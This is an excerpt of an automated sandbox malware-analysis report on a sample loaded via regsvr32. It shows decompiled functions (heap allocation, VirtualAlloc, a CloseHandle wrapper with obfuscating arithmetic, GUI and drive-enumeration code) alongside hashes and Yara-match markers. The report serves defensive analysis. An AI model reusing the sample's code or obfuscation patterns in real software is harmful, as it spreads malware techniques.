                                                                                                                • RtlAllocateHeap.NTDLL(9FA0E66D,?,00083F87), ref: 001A35AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction ID: e4877d9645bbb4c00aff37757ac1bf8aab92bc4fcf5b980bc31a43f8dea92ec9
                                                                                                                • Opcode Fuzzy Hash: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction Fuzzy Hash: E11125B5D00208FFCF05EFA4D84689EBFB5EB44704F208088F914AA221D3728B24EF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10008AF0 Relevance: 1.5, APIs: 1, Instructions: 29COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E10008AF0(void* __ebx, void* __esi, void* __eflags) {
				signed int _t2;
				void* _t3;
				signed int _t8;
				char _t10;
				signed int _t12;
				void* _t13;
				void* _t14;
				signed int _t16;

				_t2 =  *0x1006c2d4; // 0x0
				_t3 = E1003B4DA(__ebx, _t13, _t14, __esi, _t2);
				if(_t3 != 0) {
					_t12 =  *0x1006c2d4; // 0x0
					_push(__ebx);
					_t10 = 0;
					__eflags = _t12;
					_push(__esi);
					_t16 = _t12;
					if(__eflags > 0) {
						do {
							 *((char*)(_t10 + _t3)) = _t10;
							_t10 = _t10 + 1;
							__eflags = _t10 -  *0x1006c2d4; // 0x0
						} while (__eflags < 0);
					}
					_push(_t3); // executed
					E1003B59D(_t10, _t14, _t16, __eflags); // executed
					asm("sbb eax, eax");
					_t8 =  ~(_t10 - _t16) & 0x00000003;
					__eflags = _t8;
					return _t8;
				} else {
					return _t3;
				}
			}











                                                                                                                0x10008af0
                                                                                                                0x10008af6
                                                                                                                0x10008b00
                                                                                                                0x10008b03
                                                                                                                0x10008b09
                                                                                                                0x10008b0a
                                                                                                                0x10008b0c
                                                                                                                0x10008b0e
                                                                                                                0x10008b0f
                                                                                                                0x10008b11
                                                                                                                0x10008b13
                                                                                                                0x10008b13
                                                                                                                0x10008b16
                                                                                                                0x10008b19
                                                                                                                0x10008b19
                                                                                                                0x10008b13
                                                                                                                0x10008b21
                                                                                                                0x10008b22
                                                                                                                0x10008b30
                                                                                                                0x10008b33
                                                                                                                0x10008b33
                                                                                                                0x10008b37
                                                                                                                0x10008b02
                                                                                                                0x10008b02
                                                                                                                0x10008b02

                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 10008AF6
                                                                                                                  • Part of subcall function 1003B4DA: __FF_MSGBANNER.LIBCMT ref: 1003B4FD
                                                                                                                  • Part of subcall function 1003B4DA: __NMSG_WRITE.LIBCMT ref: 1003B504
                                                                                                                  • Part of subcall function 1003B4DA: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,10046716,?,00000001,00000001,10043228,00000018,10069028,0000000C,100432B7,00000001), ref: 1003B552
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 501242067-0
                                                                                                                • Opcode ID: 4aed004172c8a00353551a7f57a5b1c22511ca21975a12fc2129482ef44676f9
                                                                                                                • Instruction ID: b4225be5a86c1b20f78b8c44add161eaa028dc11eaf13bf15bfbc5b258e60bf6
                                                                                                                • Opcode Fuzzy Hash: 4aed004172c8a00353551a7f57a5b1c22511ca21975a12fc2129482ef44676f9
                                                                                                                • Instruction Fuzzy Hash: D9E0DFB2A402274BFF00CBFC9CEAD223289EB18091B440534FD82CA246E364F9048361
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10040E1E Relevance: 1.5, APIs: 1, Instructions: 6COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 25%
                                                                                                                			E10040E1E() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E10040D3F(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}








                                                                                                                0x10040e1e
                                                                                                                0x10040e20
                                                                                                                0x10040e22
                                                                                                                0x10040e24
                                                                                                                0x10040e2c

                                                                                                                APIs
                                                                                                                • _doexit.LIBCMT ref: 10040E24
                                                                                                                  • Part of subcall function 10040D3F: __lock.LIBCMT ref: 10040D4D
                                                                                                                  • Part of subcall function 10040D3F: __decode_pointer.LIBCMT ref: 10040D7C
                                                                                                                  • Part of subcall function 10040D3F: __decode_pointer.LIBCMT ref: 10040D89
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __decode_pointer$__lock_doexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 3276244213-0
                                                                                                                • Opcode ID: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
                                                                                                                • Instruction ID: c600115bdb9250202a11f0fe297c8b3a021a628b260ec84747a29f7a13455f8b
                                                                                                                • Opcode Fuzzy Hash: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
                                                                                                                • Instruction Fuzzy Hash: 0FA00269FD431921F865D1902C53F5421015750F01FE40460BF087C1C1A4E6325C945B
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B02D8 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E001B02D8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t45;
				int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				void* _t75;

				_push(_a8);
				_t75 = __ecx;
				_push(_a4);
				_push(__ecx);
				E001AC98A(_t45);
				_v12 = 0xd4268f;
				_t61 = 0x55;
				_v12 = _v12 / _t61;
				_t62 = 0x39;
				_v12 = _v12 / _t62;
				_t63 = 0x19;
				_v12 = _v12 / _t63;
				_v12 = _v12 ^ 0x00038c24;
				_v16 = 0xae7fc4;
				_v16 = _v16 + 0x7c1;
				_v16 = _v16 ^ 0x00ac1f44;
				_v8 = 0x83f9bc;
				_v8 = _v8 ^ 0x1ab9b921;
				_v8 = _v8 | 0xa5451e1d;
				_t64 = 0x5c;
				_v8 = _v8 / _t64;
				_v8 = _v8 ^ 0x021ff71d;
				E001A7F78(_t64, 0xbd3f148a, _t64, 0x72, _t64, 0x529e328);
				_t59 = CloseHandle(_t75); // executed
				return _t59;
			}













                                                                                                                0x001b02df
                                                                                                                0x001b02e2
                                                                                                                0x001b02e4
                                                                                                                0x001b02e8
                                                                                                                0x001b02e9
                                                                                                                0x001b02ee
                                                                                                                0x001b02ff
                                                                                                                0x001b0304
                                                                                                                0x001b030c
                                                                                                                0x001b0311
                                                                                                                0x001b0319
                                                                                                                0x001b031e
                                                                                                                0x001b0323
                                                                                                                0x001b032a
                                                                                                                0x001b0331
                                                                                                                0x001b0338
                                                                                                                0x001b033f
                                                                                                                0x001b0346
                                                                                                                0x001b034d
                                                                                                                0x001b0357
                                                                                                                0x001b035f
                                                                                                                0x001b0367
                                                                                                                0x001b037b
                                                                                                                0x001b0384
                                                                                                                0x001b038a

                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 001B0384
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction ID: ecc97d06b9f346d72fd1fb80af9c5d39486966fdd124c3942b58788fc7defad8
                                                                                                                • Opcode Fuzzy Hash: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction Fuzzy Hash: F6114F75E01208FFEB08DFA5D80A9EEBBB5EB85314F50C09AE514A7280E7B15F119F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100081B0 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100081B0(void* _a4, long _a8, long _a12, long _a16) {
				void* _t7;

				_t7 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t7;
			}




                                                                                                                0x100081c4
                                                                                                                0x100081ca

                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 100081C4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: e13c3a05b67672fea56b28edb14a2e5a60369e52e5ea6350a2376c363afb12c2
                                                                                                                • Instruction ID: d906071c9a55b96112e4aa30e1ba09a444a104f0164b0ab590c831ce1d9e94f6
                                                                                                                • Opcode Fuzzy Hash: e13c3a05b67672fea56b28edb14a2e5a60369e52e5ea6350a2376c363afb12c2
                                                                                                                • Instruction Fuzzy Hash: 0CC002B9608312BFEA04CB54C888C6BB7F9EBC8340F00C90CF599C3210C670E841CB22
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100081D0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100081D0(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}




                                                                                                                0x100081df
                                                                                                                0x100081e5

                                                                                                                APIs
                                                                                                                • VirtualFree.KERNELBASE(?,?,?), ref: 100081DF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1263568516-0
                                                                                                                • Opcode ID: c86a1ef333587ad7d48c71bd443cb7ea2fab6dbce4a7e32908955ba6df24cc56
                                                                                                                • Instruction ID: e40ca6c62b10dcc4d15d2a9fcd47f89be3de939b678c3a886278e2d8676f4622
                                                                                                                • Opcode Fuzzy Hash: c86a1ef333587ad7d48c71bd443cb7ea2fab6dbce4a7e32908955ba6df24cc56
                                                                                                                • Instruction Fuzzy Hash: 88C048B9218201BFEA04CB10C988C3BB7BAEBC8650F10C90CB88983210C670EC01DA22
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 1000D150 Relevance: 95.7, APIs: 45, Strings: 9, Instructions: 1164windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E1000D150(intOrPtr __ecx, void* __eflags) {
				char _v16;
				char _v52;
				char _v56;
				char _v64;
				char _v72;
				char _v76;
				char _v80;
				void* _v84;
				char _v92;
				char _v96;
				void* _v100;
				char _v108;
				char _v112;
				char _v116;
				void* _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				struct _SHFILEINFOA* _v148;
				char _v152;
				char _v156;
				void* _v160;
				void* _v164;
				void* _v168;
				void* _v172;
				signed int _v176;
				struct _SHFILEINFOA* _v196;
				struct _SHFILEINFOA* _v200;
				intOrPtr _v204;
				signed int _v212;
				char _v216;
				char _v220;
				signed int _v224;
				char* _v228;
				CHAR* _v232;
				void* _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				void* _v284;
				char _v288;
				void* _v292;
				char _v296;
				void* _v300;
				void* _v308;
				intOrPtr _v316;
				char _v324;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				void* _v348;
				char _v352;
				void* _v356;
				char _v360;
				void* _v364;
				void* _v372;
				void* _v380;
				void* _v388;
				void* _v396;
				void* _v404;
				void* _v412;
				void* _v420;
				void* _v428;
				void* _v436;
				void* _v444;
				void* _v452;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t281;
				void* _t292;
				struct HICON__* _t294;
				struct HICON__* _t300;
				struct HICON__* _t307;
				struct HICON__* _t313;
				struct HICON__* _t319;
				struct HICON__* _t326;
				struct HICON__* _t332;
				intOrPtr* _t341;
				CHAR* _t386;
				char* _t388;
				signed int _t389;
				CHAR* _t400;
				struct HICON__* _t406;
				struct HICON__* _t413;
				struct HICON__* _t419;
				struct HICON__* _t425;
				struct HICON__* _t432;
				struct HICON__* _t438;
				struct HICON__* _t444;
				struct HICON__* _t460;
				long _t467;
				void* _t469;
				intOrPtr* _t479;
				void* _t484;
				void* _t489;
				void* _t494;
				int _t501;
				int _t505;
				int _t509;
				intOrPtr* _t535;
				struct _SHFILEINFOA* _t540;
				char* _t542;
				intOrPtr* _t558;
				char* _t562;
				char* _t563;
				signed int** _t566;
				signed int _t571;
				signed int _t575;
				signed int** _t577;
				intOrPtr* _t586;
				intOrPtr _t589;
				intOrPtr* _t590;
				signed int** _t594;
				intOrPtr* _t602;
				void* _t607;
				struct _SHFILEINFOA* _t608;
				signed int _t678;
				intOrPtr _t716;
				signed int _t719;
				signed int _t754;
				char* _t761;
				signed int _t776;
				signed int _t788;
				signed int _t814;
				void* _t819;
				signed int _t830;
				signed int _t833;
				signed int _t835;
				signed int _t838;
				void* _t844;
				void* _t847;
				long _t848;
				long _t850;
				char* _t852;
				void* _t855;
				long _t856;
				void* _t859;
				intOrPtr* _t860;
				signed int _t862;
				intOrPtr _t865;
				signed int _t875;
				signed int _t877;
				intOrPtr _t878;
				void* _t879;
				void* _t880;
				intOrPtr* _t881;

				_t880 = __eflags;
				_push(0xffffffff);
				_push(E10051C60);
				_push( *[fs:0x0]);
				_t877 = (_t875 & 0xfffffff8) - 0xa4;
				_push(_t844);
				_t281 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t281 ^ _t877);
				 *[fs:0x0] =  &_v16;
				_t865 = __ecx;
				E10021017(__ecx, _t844);
				_t845 = SendMessageA;
				SendMessageA( *(_t865 + 0x20), 0x80, 1,  *(_t865 + 0x7dc));
				SendMessageA( *(_t865 + 0x20), 0x80, 0,  *(_t865 + 0x7dc));
				_t607 = _t865 + 0x7d4;
				 *0x1006f050 = _t865;
				E1002699F(_t607, _t880, 0x20, 0x20, 0x19, 0, 1);
				E10023187(_t607, SendMessageA, _t865, _t880);
				_t292 = E10023187(_t607, SendMessageA, _t865, _t880);
				_t870 = LoadIconA;
				_t294 = LoadIconA( *(_t292 + 0xc), 0x88);
				E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t607, SendMessageA, _t865, _t880) + 0x78)))), _t880,  *((intOrPtr*)(_t865 + 0x7d8)), 0xffffffff, _t294);
				E10023187(_t607, SendMessageA, _t865, _t880);
				_t300 = LoadIconA( *(E10023187(_t607, SendMessageA, _t865, _t880) + 0xc), 0x89);
				E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t607, SendMessageA, _t865, _t880) + 0x78)))), _t880,  *((intOrPtr*)(_t865 + 0x7d8)), 0xffffffff, _t300);
				E10023187(_t607, _t845, _t865, _t880);
				_t307 = LoadIconA( *(E10023187(_t607, _t845, _t865, _t880) + 0xc), 0x8a);
				E1000BF10( *( *(E10023187(_t607, _t845, _t865, _t880) + 0x78)), _t880,  *((intOrPtr*)(_t865 + 0x7d8)), 0xffffffff, _t307);
				E10023187(_t607, _t845, _t865, _t880);
				_t313 = LoadIconA( *(E10023187(_t607, _t845, _t865, _t880) + 0xc), 0x8b);
				E1000BF10( *( *(E10023187(_t607, _t845, _t865, _t880) + 0x78)), _t880,  *((intOrPtr*)(_t865 + 0x7d8)), 0xffffffff, _t313);
				E10023187(_t607, _t845, _t865, _t880);
				_t319 = LoadIconA( *(E10023187(_t607, _t845, _t865, _t880) + 0xc), 0x8c);
				E1000BF10( *( *(E10023187(_t607, _t845, _t865, _t880) + 0x78)), _t880,  *((intOrPtr*)(_t865 + 0x7d8)), 0xffffffff, _t319);
				E10023187(_t607, _t845, _t865, _t880);
				_t326 = LoadIconA( *(E10023187(_t607, _t845, _t865, _t880) + 0xc), 0x8d);
				E1000BF10( *( *(E10023187(_t607, _t845, _t865, _t880) + 0x78)), _t880,  *((intOrPtr*)(_t865 + 0x7d8)), 0xffffffff, _t326);
				E10023187(_t607, _t845, _t865, _t880);
				_t332 = LoadIconA( *(E10023187(_t607, _t845, _t865, _t880) + 0xc), 0x8e);
				_t807 =  *(E10023187(_t607, _t845, _t865, _t880) + 0x78);
				E1000BF10( *( *(E10023187(_t607, _t845, _t865, _t880) + 0x78)), _t880,  *((intOrPtr*)(_t865 + 0x7d8)), 0xffffffff, _t332);
				_t846 = _t865 + 0x5a4;
				_push(_t607);
				E10011BB0(_t607, _t865 + 0x5a4, _t865 + 0x5a4, _t865);
				_push(0x1f4);
				E10011AA0(_t607, _t865 + 0x5a4, _t865 + 0x5a4, _t865, LoadIconA, _t880, 0x10058700);
				_push(0x1f5);
				E10011AA0(_t607, _t865 + 0x5a4, _t846, _t865, LoadIconA, _t880, 0x100586f4);
				_push(0x1f6);
				E10011AA0(_t607, _t846, _t846, _t865, LoadIconA, _t880, 0x100586ec);
				_push(0x1f7);
				E10011AA0(_t607, _t846, _t846, _t865, LoadIconA, _t880, 0x100586e4);
				_push(0x1f8);
				E10011AA0(_t607, _t846, _t846, _t865, LoadIconA, _t880, 0x100586dc);
				 *((intOrPtr*)(_t865 + 0x668)) = E1000C240;
				_t341 = E100173A6();
				_t608 = 0;
				_t881 = _t341;
				_t637 = 0 | _t881 == 0x00000000;
				_t882 = _t881 == 0;
				if(_t881 == 0) {
					L1:
					_t341 = E10001000(_t637, _t807, 0x80004005);
				}
				_v200 =  *((intOrPtr*)( *((intOrPtr*)( *_t341 + 0xc))))() + 0x10;
				 *(_t877 + 0xc8) = _t608;
				E10001DB0( &_v200,  *_t341, 0x10058434, 0xc);
				E10011A40(_t846, _t846, _t865, _t870, _t608, _t877 + 0x18);
				E10001DB0( &_v216,  *_t341, 0x10058424, 0xe);
				E10011A40(_t846, _t846, _t865, _t870, _t608,  &_v224);
				E10001DB0( &_v232,  &_v224, 0x10058414, 0xc);
				E10011A40(_t846, _t846, _t865, _t870, _t608,  &_v240);
				E10001DB0( &_v248,  &_v224, 0x10058404, 0xc);
				E10011A40(_t846, _t846, _t865, _t870, 1, _t877 + 0x18);
				E10001DB0( &_v264,  &_v224, 0x100583f4, 0xc);
				E10011A40(_t846, _t846, _t865, _t870, 1,  &_v272);
				E10001DB0( &_v280,  &_v272, 0x100583ec, 4);
				E10011A40(_t846, _t846, _t865, _t870, 2,  &_v288);
				E10001DB0( &_v296,  &_v272, 0x100583d8, 0x12);
				E10011A40(_t846, _t846, _t865, _t870, 2, _t877 + 0x18);
				E10001DB0(_t877 + 0x20,  &_v272, 0x100583c4, 0x12);
				E10011A40(_t846, _t846, _t865, _t870, 2, _t877 + 0x18);
				E10001DB0(_t877 + 0x20, _t877 + 0x18, 0x100583b8, 0xa);
				E10011A40(_t846, _t846, _t865, _t870, 2,  &_v336);
				E10001DB0( &_v344, _t877 + 0x18, 0x100583ac, 8);
				E10011A40(_t846, _t846, _t865, _t870, 2,  &_v352);
				E10001DB0( &_v360, _t877 + 0x18, 0x100583a0, 0xa);
				E10011A40(_t846, _t846, _t865, _t870, 2, _t877 + 0x18);
				E10001DB0(_t877 + 0x20, _t877 + 0x18, 0x10058398, 4);
				E10011A40(_t846, _t846, _t865, _t870, 3, _t877 + 0x18);
				E10001DB0(_t877 + 0x20, _t877 + 0x18, 0x10058390, 4);
				E10011A40(_t846, _t846, _t865, _t870, 3, _t877 + 0x18);
				E10001DB0(_t877 + 0x20, _t877 + 0x18, 0x10058384, 0xa);
				E10011A40(_t846, _t846, _t865, _t870, 4, _t877 + 0x18);
				E10001DB0(_t877 + 0x20, _t877 + 0x18, 0x10058370, 0x10);
				E10011A40(_t846, _t846, _t865, _t870, 4, _t877 + 0x18);
				_t847 = _t865 + 0x7e0;
				E1002699F(_t847, _t882, 0x10, 0x10, 0x21, _t608, _t608);
				_t883 = _t847 - _t608;
				if(_t847 != _t608) {
					_t848 =  *(_t847 + 4);
				} else {
					_t848 = 0;
				}
				_push(SendMessageA( *(_t865 + 0x570), 0x1109, _t608, _t848));
				E1002688E(_t608,  *(_t865 + 0x570), _t848, _t865, _t883);
				E1001D270(_t865 + 0x550, _t608, 6, _t608);
				 *((intOrPtr*)(_t877 + 0x5c)) = E100263F9(_t865 + 0x550, 1, 0x100586d0, _t608, _t608, _t608, _t608, _t608, 0xffff0000, 0xffff0002);
				_t850 = GetLogicalDriveStringsA(_t608, _t608);
				_t70 = _t850 + 1; // 0x1
				_t814 = _t70;
				_t386 = E100160EC(_t883, _t814);
				_t878 = _t877 + 4;
				_v232 = _t386;
				if(GetLogicalDriveStringsA(_t850, _t386) == _t850 + 0xffffffff) {
					_t388 =  *(_t878 + 0x2c);
					_t852 = _t388;
					 *(_t878 + 0x24) = _t852;
					_t815 =  &(_t388[1]);
					do {
						_t678 =  *_t388;
						_t388 =  &(_t388[1]);
						__eflags = _t678;
					} while (_t678 != 0);
					_t389 = _t388 - _t815;
					__eflags = _t389;
					_v176 = _t389;
					if(__eflags == 0) {
						L34:
						E10001DB0(_t865 + 0x94c, _t815, 0x10056948, _t608);
						E1001D35E(_t865 + 0x550, _t608);
						E1001D39A(_t865 + 0x400, _t608);
						E1001D39A(_t865 + 0x3ac, _t608);
						E1001D35E(_t865 + 0x4fc, _t608);
						E1001D35E(_t865 + 0x454, _t608);
						E1001D35E(_t865 + 0x358, _t608);
						 *((intOrPtr*)(_t865 + 0x288)) = 0;
						 *((intOrPtr*)(_t865 + 0x284)) = 0;
						E1001D2C4(_t865 + 0x454, 0x10056948);
						E1002A93C( &_v156, __eflags);
						_push(_t608);
						_push("data\\*.*");
						_v72 = 6;
						_t400 = E1002A9C8( &_v156, _t815, __eflags);
						_t854 = _t865 + 0x1018;
						_v232 = _t400;
						E1001F707(_t865 + 0x1018, _t608, 0xffffffff);
						__eflags = _v240 - _t608;
						while(__eflags != 0) {
							_t540 = E1002A655( &_v128);
							_t761 =  &_v128;
							_v196 = _t540;
							__eflags = E1002A903(_t761);
							if(__eflags == 0) {
								_t542 = E100160BC(__eflags, 0x20);
								_t878 = _t878 + 4;
								 *((intOrPtr*)(_t878 + 0x1c)) = _t542;
								__eflags = _t542 - _t608;
								 *((char*)(_t878 + 0xc0)) = 7;
								if(__eflags == 0) {
									_v200 = _t608;
								} else {
									_t761 = _t542;
									_v200 = E10002490(_t815);
								}
								_push(_t761);
								 *((intOrPtr*)(_t878 + 0x20)) = _t878;
								_push(_t878);
								_t173 =  &_v128; // 0x70
								 *((char*)(_t878 + 0xc8)) = 6;
								E1002AB67(_t608, _t173, _t815, _t854, _t865, __eflags);
								E10001C90(_v204, _t815, __eflags);
								_t815 =  *(_t878 + 0x24);
								E1001F82B(_t608, _t854, _t870,  *((intOrPtr*)(_t854 + 8)),  *(_t878 + 0x24));
							}
							__eflags = _v196 - _t608;
						}
						_t855 = _t865 + 0x27c;
						E1002699F(_t855, __eflags, 0x4a, 0x4a, 0xff, 0x14, 1);
						E10023187(_t608, _t855, _t865, __eflags);
						_t406 = LoadIconA( *(E10023187(_t608, _t855, _t865, __eflags) + 0xc), 0x94);
						E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t855, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x280)), 0xffffffff, _t406);
						E10023187(_t608, _t855, _t865, __eflags);
						_t413 = LoadIconA( *(E10023187(_t608, _t855, _t865, __eflags) + 0xc), 0x91);
						E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t855, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x280)), 0xffffffff, _t413);
						E10023187(_t608, _t855, _t865, __eflags);
						_t419 = LoadIconA( *(E10023187(_t608, _t855, _t865, __eflags) + 0xc), 0x92);
						E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t855, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x280)), 0xffffffff, _t419);
						E10023187(_t608, _t855, _t865, __eflags);
						_t425 = LoadIconA( *(E10023187(_t608, _t855, _t865, __eflags) + 0xc), 0x93);
						E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t855, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x280)), 0xffffffff, _t425);
						E10023187(_t608, _t855, _t865, __eflags);
						_t432 = LoadIconA( *(E10023187(_t608, _t855, _t865, __eflags) + 0xc), 0x95);
						E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t855, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x280)), 0xffffffff, _t432);
						E10023187(_t608, _t855, _t865, __eflags);
						_t438 = LoadIconA( *(E10023187(_t608, _t855, _t865, __eflags) + 0xc), 0x90);
						E1000BF10( *((intOrPtr*)( *((intOrPtr*)(E10023187(_t608, _t855, _t865, __eflags) + 0x78)))), __eflags,  *((intOrPtr*)(_t865 + 0x280)), 0xffffffff, _t438);
						E10023187(_t608, _t855, _t865, __eflags);
						_t444 = LoadIconA( *(E10023187(_t608, _t855, _t865, __eflags) + 0xc), 0x96);
